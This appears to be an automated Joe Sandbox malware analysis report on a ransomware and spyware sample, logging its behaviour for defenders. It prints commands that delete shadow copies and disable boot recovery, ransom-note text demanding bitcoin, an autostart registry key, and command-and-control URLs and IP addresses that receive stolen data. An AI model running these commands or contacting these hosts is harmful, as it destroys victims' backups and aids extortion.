Analysis Report

Overview

General Information

Joe Sandbox Version:14.0.0
Analysis ID:125244
Start time:12:12:31
Joe Sandbox Product:Cloud
Start date:12/05/2016
Overall analysis duration:0h 9m 3s
Report type:full
Sample file name:94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2003 SP1, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36)
Number of analysed new started processes analysed:25
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection:MAL
Classification:mal76.evad.rans.phis.spyw.troj.winEXE@20/232@15/6
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 81
  • Number of non-executed functions: 69
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 31.1% (good quality ratio 26.7%)
  • Quality average: 66.7%
  • Quality standard deviation: 35.8%
Cookbook Comments:
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): mscorsvw.exe, sppsvc.exe, VSSVC.exe, WmiApSrv.exe, conhost.exe, WMIADAP.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.


Detection

StrategyScoreRangeReportingDetection
Threshold760 - 100Report FP / FNmalicious


RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvadercleansuspiciousmalicious

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample sleeps for a long time, analyze it with the fake sleep cookbook



Signature Overview

Click to jump to signature section


Spam, unwanted Advertisements and Ransom Demands:

barindex
Deletes shadow drive data (may be related to ransomware)
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: fwindir%s\system32\cmd.exe/c start "" ""runasvssadmin.exe delete shadows /all /Quiet openrunas234058000Shell32.dllKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\recover_file_.txt:Zone.IdentifierSeDebugPrivilege12393578327533451bcdedit.exe /set {current} bootems offbcdedit.exe /set {current} advancedoptions offbcdedit.exe /set {current} optionsedit offbcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresbcdedit.exe /set {current} recoveryenabled offw+%s
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\vssadmin.exe C:\Windows\System32\vssadmin.exe delete shadows /all /Quiet
Source: amhfnhe45.exeBinary or memory string: fwindir%s\system32\cmd.exe/c start "" ""runasvssadmin.exe delete shadows /all /Quiet openrunas234058000Shell32.dllKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\recover_file_.txt:Zone.IdentifierSeDebugPrivilege12393578327533451bcdedit.exe /set {current} bootems offbcdedit.exe /set {current} advancedoptions offbcdedit.exe /set {current} optionsedit offbcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresbcdedit.exe /set {current} recoveryenabled offw+%s
Source: vssadmin.exeBinary or memory string: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
Source: vssadmin.exeBinary or memory string: C:\C:\Windows\System32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet C:\Windows\System32\vssadmin.exeWinsta0\Default
Source: vssadmin.exeBinary or memory string: oF oF0oF:oFC:\Windows\System32\vssadmin.exedeleteshadows/all/Quiet
Source: vssadmin.exeBinary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exeBinary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exeBinary or memory string: vssadmin Delete Shadows
Source: vssadmin.exeBinary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exeBinary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
Writes a notice file (html or txt) to demand a ransom
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile dropped: C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1001\help_recover_instructions+uuk.txt -> __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! not your language? use https://translate.google.com what happened to your files ?all of your files were protected by a strong encryption with rsa-4096.more information about the encryption keys using rsa-4096 can be found here: http://en.wikipedia.org/wiki/rsa_(cryptosystem)how did this happen ?!!! specially for your pc was generated personal rsa-4096 key, both public and private.!!! all your files were encrypted with the public key, which has been transferred to your computer via the internet.decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining btc now, and restore your data easy way.if you have really
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile dropped: C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1001\help_recover_instructions+uuk.html -> <html><!-- 72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33ccff;"> <!--72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234-72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <center><div style="text-align:left; font-family:arial; <!------72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#f4f4f4; padding:20px; border-style:solid; border-width:5px; border-color:#bababa;"><b><font class="ttl"><center><b>not your language? use <a href="https://translate.google.com" ta
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile dropped: C:\$Recycle.Bin\help_recover_instructions+uuk.txt -> __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! not your language? use https://translate.google.com what happened to your files ?all of your files were protected by a strong encryption with rsa-4096.more information about the encryption keys using rsa-4096 can be found here: http://en.wikipedia.org/wiki/rsa_(cryptosystem)how did this happen ?!!! specially for your pc was generated personal rsa-4096 key, both public and private.!!! all your files were encrypted with the public key, which has been transferred to your computer via the internet.decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining btc now, and restore your data easy way.if you have really valuable data, you better not waste your tim
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile dropped: C:\$Recycle.Bin\help_recover_instructions+uuk.html -> <html><!-- 72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33ccff;"> <!--72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234-72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <center><div style="text-align:left; font-family:arial; <!------72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#f4f4f4; padding:20px; border-style:solid; border-width:5px; border-color:#bababa;"><b><font class="ttl"><center><b>not your language? use <a href="https://translate.google.com" target="_blank">google translate</a></b></cente
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\11.0\Cache\help_recover_instructions+uuk.txt -> __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! not your language? use https://translate.google.com what happened to your files ?all of your files were protected by a strong encryption with rsa-4096.more information about the encryption keys using rsa-4096 can be found here: http://en.wikipedia.org/wiki/rsa_(cryptosystem)how did this happen ?!!! specially for your pc was generated personal rsa-4096 key, both public and private.!!! all your files were encrypted with the public key, which has been transferred to your computer via the internet.decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining btc now, and restore your data easy way.if you have really valuab
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\11.0\Cache\help_recover_instructions+uuk.html -> <html><!-- 72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33ccff;"> <!--72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234-72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <center><div style="text-align:left; font-family:arial; <!------72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#f4f4f4; padding:20px; border-style:solid; border-width:5px; border-color:#bababa;"><b><font class="ttl"><center><b>not your language? use <a href="https://translate.google.com" target="_
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\11.0\help_recover_instructions+uuk.txt -> __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! not your language? use https://translate.google.com what happened to your files ?all of your files were protected by a strong encryption with rsa-4096.more information about the encryption keys using rsa-4096 can be found here: http://en.wikipedia.org/wiki/rsa_(cryptosystem)how did this happen ?!!! specially for your pc was generated personal rsa-4096 key, both public and private.!!! all your files were encrypted with the public key, which has been transferred to your computer via the internet.decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining btc now, and restore your data easy way.if you have really valuable dat
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\11.0\help_recover_instructions+uuk.html -> <html><!-- 72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33ccff;"> <!--72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234-72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <center><div style="text-align:left; font-family:arial; <!------72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#f4f4f4; padding:20px; border-style:solid; border-width:5px; border-color:#bababa;"><b><font class="ttl"><center><b>not your language? use <a href="https://translate.google.com" target="_blank"
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\9.0\Cache\help_recover_instructions+uuk.txt -> __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! not your language? use https://translate.google.com what happened to your files ?all of your files were protected by a strong encryption with rsa-4096.more information about the encryption keys using rsa-4096 can be found here: http://en.wikipedia.org/wiki/rsa_(cryptosystem)how did this happen ?!!! specially for your pc was generated personal rsa-4096 key, both public and private.!!! all your files were encrypted with the public key, which has been transferred to your computer via the internet.decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining btc now, and restore your data easy way.if you have really valuabl
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\9.0\Cache\help_recover_instructions+uuk.html -> <html><!-- 72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33ccff;"> <!--72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234-72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <center><div style="text-align:left; font-family:arial; <!------72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#f4f4f4; padding:20px; border-style:solid; border-width:5px; border-color:#bababa;"><b><font class="ttl"><center><b>not your language? use <a href="https://translate.google.com" target="_b

Networking:

barindex
Urls found in memory or binary data
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeString found in binary or memory: file:///c:/windows/system32/cmd.exe
Source: amhfnhe45.exeString found in binary or memory: file:///c:/windows/system32/vssadmin.exe
Source: amhfnhe45.exeString found in binary or memory: http://aynf
Source: amhfnhe45.exeString found in binary or memory: http://aynfksddnnfwkd.jockmias.com/%s
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, amhfnhe45.exeString found in binary or memory: http://aynfksddnnfwkd.jockmias.com/%s2.
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, amhfnhe45.exeString found in binary or memory: http://aynfksddnnfwkd.jockmias.com/%s4.
Source: amhfnhe45.exeString found in binary or memory: http://aynfksddnnfwkd.jockmias.com/aa6a331c729ca
Source: help_recover_instructions+uuk.html5.2748.drString found in binary or memory: http://aynfksddnnfwkd.jockmias.com/aa6a331c729ca1f
Source: help_recover_instructions+uuk.html5.2748.drString found in binary or memory: http://en.wikipedia.org/wiki/rsa_(cryptosystem)
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, amhfnhe45.exeString found in binary or memory: http://go.microsoft.com/fwlink/?linkid=125824-http://go.microsoft.com/fwlink/?linkid=125723-http://g
Source: bcdedit.exeString found in binary or memory: http://go.microsoft.com/fwlink/?linkid=92362.
Source: amhfnhe45.exeString found in binary or memory: http://ib.adnxs.com/seg?add=2594913:0&t=2
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, amhfnhe45.exeString found in binary or memory: http://ip.tyk.nu/
Source: amhfnhe45.exeString found in binary or memory: http://ip.tyk.nu/q4
Source: amhfnhe45.exeString found in binary or memory: http://ip.tyk.nu/w4
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, amhfnhe45.exeString found in binary or memory: http://krf
Source: amhfnhe45.exeString found in binary or memory: http://krfdnhfnsai3d.abeleros.com/%
Source: amhfnhe45.exeString found in binary or memory: http://krfdnhfnsai3d.abeleros.com/%s
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, amhfnhe45.exeString found in binary or memory: http://krfdnhfnsai3d.abeleros.com/%s3.
Source: help_recover_instructions+uuk.html5.2748.drString found in binary or memory: http://krfdnhfnsai3d.abeleros.com/aa6a331c729ca1f
Source: amhfnhe45.exeString found in binary or memory: http://mad4milk.net
Source: amhfnhe45.exeString found in binary or memory: http://mengzhaoshituan.com/dbinfo.php
Source: amhfnhe45.exeString found in binary or memory: http://mengzhaoshituan.com/dbinfo.phpu
Source: amhfnhe45.exeString found in binary or memory: http://mootools.net
Source: amhfnhe45.exeString found in binary or memory: http://partaci.info/administrator/components/com_languages/views/installed/tmpl/dbinfo.php
Source: amhfnhe45.exeString found in binary or memory: http://partaci.info/administrator/components/com_languages/views/installed/tmpl/dbinfo.php?
Source: amhfnhe45.exeString found in binary or memory: http://partaci.info/administrator/components/com_languages/views/installed/tmpl/dbinfo.phpa
Source: amhfnhe45.exeString found in binary or memory: http://pvsea.org/cms/layouts/joomla/tinymce/dbinfo.php
Source: amhfnhe45.exeString found in binary or memory: http://pvsea.org/cms/layouts/joomla/tinymce/dbinfo.phpa
Source: amhfnhe45.exeString found in binary or memory: http://pvsea.org/cms/layouts/joomla/tinymce/dbinfo.phpfin4vxqc6u6bssqbew=yp=yp=
Source: amhfnhe45.exeString found in binary or memory: http://tellambode.com/plugins/captcha/dbinfo.php
Source: amhfnhe45.exeString found in binary or memory: http://tellambode.com/plugins/captcha/dbinfo.php02c
Source: amhfnhe45.exeString found in binary or memory: http://topdrivers.org/components/com_mailto/views/dbinfo.php
Source: amhfnhe45.exeString found in binary or memory: http://upatguadeloupe.com/cb/dbinfo.php
Source: amhfnhe45.exeString found in binary or memory: http://upatguadeloupe.com/cb/dbinfo.phpa
Source: amhfnhe45.exeString found in binary or memory: http://www.torproject.org/projects/
Source: help_recover_instructions+uuk.html5.2748.drString found in binary or memory: http://www.torproject.org/projects/torbrowser.html.en
Source: amhfnhe45.exeString found in binary or memory: http://www.upatguadeloupe.com/fr/error4041
Source: amhfnhe45.exeString found in binary or memory: http://www.upatguadeloupe.com/fr/error4041o
Source: amhfnhe45.exeString found in binary or memory: http://www.w3.org/1999/xlink
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, amhfnhe45.exeString found in binary or memory: https://
Source: amhfnhe45.exeString found in binary or memory: https://4nauizsaaopuj3qj.onion.cab/%s
Source: help_recover_instructions+uuk.html5.2748.drString found in binary or memory: https://4nauizsaaopuj3qj.onion.cab/aa6a331c729ca1f
Source: amhfnhe45.exeString found in binary or memory: https://4nauizsaaopuj3qj.onion.to/%s
Source: help_recover_instructions+uuk.html5.2748.drString found in binary or memory: https://4nauizsaaopuj3qj.onion.to/aa6a331c729ca1f
Source: amhfnhe45.exeString found in binary or memory: https://4nauizsaaopuj3qj.tor2web.org/%s
Source: help_recover_instructions+uuk.html5.2748.drString found in binary or memory: https://4nauizsaaopuj3qj.tor2web.org/aa6a331c729ca1f
Source: amhfnhe45.exe, help_recover_instructions+uuk.txt45.2748.dr, help_recover_instructions+uuk.html41.2748.dr, help_recover_instructions+uuk.html31.2748.dr, help_recover_instructions+uuk.txt52.2748.dr, help_recover_instructions+uuk.txt46.2748.dr, help_recover_instructions+uuk.txt28.2748.dr, help_recover_instructions+uuk.html49.2748.dr, help_recover_instructions+uuk.html33.2748.dr, help_recover_instructions+uuk.html21.2748.dr, help_recover_instructions+uuk.txt21.2748.dr, help_recover_instructions+uuk.html20.2748.dr, help_recover_instructions+uuk.txt7.2748.dr, help_recover_instructions+uuk.txt71.2748.dr, help_recover_instructions+uuk.html44.2748.dr, help_recover_instructions+uuk.html48.2748.dr, help_recover_instructions+uuk.html29.2748.dr, help_recover_instructions+uuk.txt49.2748.dr, help_recover_instructions+uuk.html53.2748.dr, help_recover_instructions+uuk.txt33.2748.dr, help_recover_instructions+uuk.txt16.2748.dr, help_recover_instructions+uuk.txt2.2748.dr, help_recover_instructions+uuk.txt17.2748.dr, help_recover_instructions+uuk.html12.2748.dr, help_recover_instructions+uuk.txt20.2748.dr, help_recover_instructions+uuk.html11.2748.dr, help_recover_instructions+uuk.html26.2748.dr, help_recover_instructions+uuk.html0.2748.dr, help_recover_instructions+uuk.html68.2748.dr, help_recover_instructions+uuk.html56.2748.dr, help_recover_instructions+uuk.html2.2748.dr, help_recover_instructions+uuk.html4.2748.dr, help_recover_instructions+uuk.txt40.2748.dr, help_recover_instructions+uuk.txt4.2748.dr, help_recover_instructions+uuk.html3.2748.dr, help_recover_instructions+uuk.html23.2748.dr, help_recover_instructions+uuk.html7.2748.dr, help_recover_instructions+uuk.html67.2748.dr, help_recover_instructions+uuk.txt69.2748.dr, help_recover_instructions+uuk.txt29.2748.dr, help_recover_instructions+uuk.txt56.2748.dr, help_recover_instructions+uuk.html25.2748.dr, help_recover_instructions+uuk.txt19.2748.dr, help_recover_instructions+uuk.html1.2748.dr, help_recover_instructions+uuk.html5.2748.drString found in binary or memory: https://translate.google.com
Contains functionality to download additional files from the internet
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_0041BB40 InternetReadFile,1_2_0041BB40
Downloads files
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile created: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OKZXCG0M\76HMLWKC.txt
Downloads files from webservers via HTTP
Source: global trafficHTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko Host: ip.tyk.nu
Found strings which match to known social media urls
Source: amhfnhe45.exeString found in binary or memory: yahoo.com equals www.yahoo.com (Yahoo)
Source: amhfnhe45.exeString found in binary or memory: yahoo.com/ equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknownDNS traffic detected: queries for: ip.tyk.nu
Posts data to webserver
Source: unknownHTTP traffic detected: POST /components/com_mailto/views/dbinfo.php HTTP/1.1 Accept: y6 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko Host: topdrivers.org Content-Length: 741 Cache-Control: no-cache Data Raw: 64 61 74 61 3d 41 41 33 38 37 41 32 45 43 44 44 30 45 36 44 44 30 32 44 45 38 43 37 38 36 34 42 32 44 46 32 41 36 43 33 42 42 43 34 35 46 42 34 31 33 33 31 44 43 34 35 46 38 36 34 39 44 42 44 33 36 44 30 45 43 33 34 30 41 39 43 34 32 33 45 35 46 45 45 44 33 39 35 46 39 39 38 38 38 30 36 44 35 42 46 45 33 37 36 36 42 38 34 46 42 42 33 39 32 41 39 34 39 31 30 37 39 43 38 46 33 37 46 39 33 38 34 33 39 46 37 35 38 39 43 30 32 46 41 39 31 42 41 39 44 36 30 30 37 32 37 32 31 38 42 30 30 31 39 34 39 38 39 42 34 32 33 37 46 38 36 36 42 39 35 38 43 34 41 42 35 31 30 34 34 35 42 41 37 37 37 34 37 37 41 38 30 30 42 33 30 35 32 43 43 38 33 33 46 42 32 42 36 38 38 42 38 36 42 33 41 43 46 41 31 36 42 33 39 44 30 30 39 41 31 45 31 45 34 46 35 44 31 44
Tries to download non-existing http data (HTTP/1.1 404 Not Found)
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 12 May 2016 10:14:19 GMT Server: Apache Content-Length: 236 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: DYNSRV=lin238; path=/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 63 6f 6d 5f 6d 61 69 6c 74 6f 2f 76 69 65 77 73 2f 64 62 69 6e 66 6f 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><bod
Uses a known web browser user agent for HTTP communication
Source: global trafficHTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko Host: ip.tyk.nu
Source: global trafficHTTP traffic detected: POST /components/com_mailto/views/dbinfo.php HTTP/1.1 Accept: y6 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko Host: topdrivers.org Content-Length: 741 Cache-Control: no-cache Data Raw: 64 61 74 61 3d 41 41 33 38 37 41 32 45 43 44 44 30 45 36 44 44 30 32 44 45 38 43 37 38 36 34 42 32 44 46 32 41 36 43 33 42 42 43 34 35 46 42 34 31 33 33 31 44 43 34 35 46 38 36 34 39 44 42 44 33 36 44 30 45 43 33 34 30 41 39 43 34 32 33 45 35 46 45 45 44 33 39 35 46 39 39 38 38 38 30 36 44 35 42 46 45 33 37 36 36 42 38 34 46 42 42 33 39 32 41 39 34 39 31 30 37 39 43 38 46 33 37 46 39 33 38 34 33 39 46 37 35 38 39 43 30 32 46 41 39 31 42 41 39 44 36 30 30 37 32 37 32 31 38 42 30 30 31 39 34 39 38 39 42 34 32 33 37 46 38 36 36 42 39 35 38 43 34 41 42 35 31 30 34 34 35 42 41 37 37 37 34 37 37 41 38 30 30 42 33 30 35 32 43 43 38 33 33 46 42 32 42 36 38 38 42 38 36 42 33 41 43 46 41 31 36 42 33 39 44 30 30 39 41 31 45 31 45 34 46 35 44 31 44

Boot Survival:

barindex
Creates an autostart registry key
Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run game342
Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run game342

Stealing of Sensitive Information:

barindex
Searches for Windows Mail specific files
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeDirectory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail *
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeDirectory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeDirectory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeDirectory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeDirectory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeDirectory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeDirectory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeDirectory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery unknown
Send process data via the network to a C&C
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
